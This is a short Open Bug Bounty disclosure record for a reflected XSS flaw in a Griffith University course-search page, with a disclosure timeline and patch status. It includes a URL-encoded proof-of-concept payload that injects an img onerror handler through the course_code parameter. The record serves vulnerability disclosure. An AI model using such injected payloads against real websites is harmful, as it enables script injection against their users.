app.griffith.edu.au XSS vulnerability

2015-08-18T11:29:00
ID OBB:80205
Type openbugbounty
Reporter bugs3ra
Modified 2017-07-25T14:07:00

Description

Vulnerable URL:
http://app.griffith.edu.au/course-profile-search/?course_code=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&semester;=3155&submit;=Find+profiles%2Foutlines
Details:

Description| Value
---|---
Patched:| Yes, at 25.07.2017
Latest check for patch:| 25.07.2017 14:07 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check app.griffith.edu.au SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 18 August, 2015 11:29 GMT
Vulnerability existence verified and confirmed| 18 August, 2015 11:32 GMT
Vulnerability patched by the website owner| 25 July, 2017 14:07 GMT